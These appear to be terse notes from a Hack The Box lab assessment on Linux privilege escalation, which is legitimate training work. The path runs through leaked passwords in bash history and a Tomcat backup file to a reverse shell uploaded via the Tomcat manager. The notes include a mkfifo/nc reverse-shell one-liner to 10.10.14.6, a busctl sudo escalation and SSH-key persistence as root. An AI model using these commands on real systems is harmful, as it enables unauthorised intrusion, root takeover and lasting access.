Assessment
-
Notes
-
htb-student
- read history
- find flag1 in the hidden directories
- read barry history
su barryi_l0ve_s3cur1ty!
- barry
- flag in ~
- part of
admgroup - reading
/var/log- something like
cmd/cmd.jsp?cmd=cat+flag3.txt
- something like
- we can find
flag3.txtin /var/log itself (DIDNT FIND ORIGINALLY) - looking for tomcat
/etc/tomcat9/var/lib/tomcat9
- found
tomcatadmpassword intomcat-users.xml.bakT0mc@t_s3cret_p@ss!
- login into the application at 8080
- upload reverse shell on
manager - rsh as
tomcat+flag4in folder
- tomcat
sudo -lsudo /usr/bin/busctl- gtfobin exploit not working
- opened another nc listener (nc2)
- ran on nc1 -
f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.6 8844 >/tmp/f - received shell on nc2
- made it stable using
python3 -c 'import pty;pty.spawn("/bin/bash")'- did it 2-3 times
- ran the gtfobin busctl exploit to get
root - moved to the root directory to get
flag5.txt ssh-keygenin.ssh- added
id_rsa.pubto authorized keys - copied
id_rsato kali using http.server chmod 600 id_rsassh -i id_rsa root@ip.ad.dr.rs
- root
- back to reading
/var/log- found something like
cmd/cmd.jsp?cmd=cat+flag3.txt
- found something like
grep -r "LLPE" .flag3.txtwas present in the same folder
- back to reading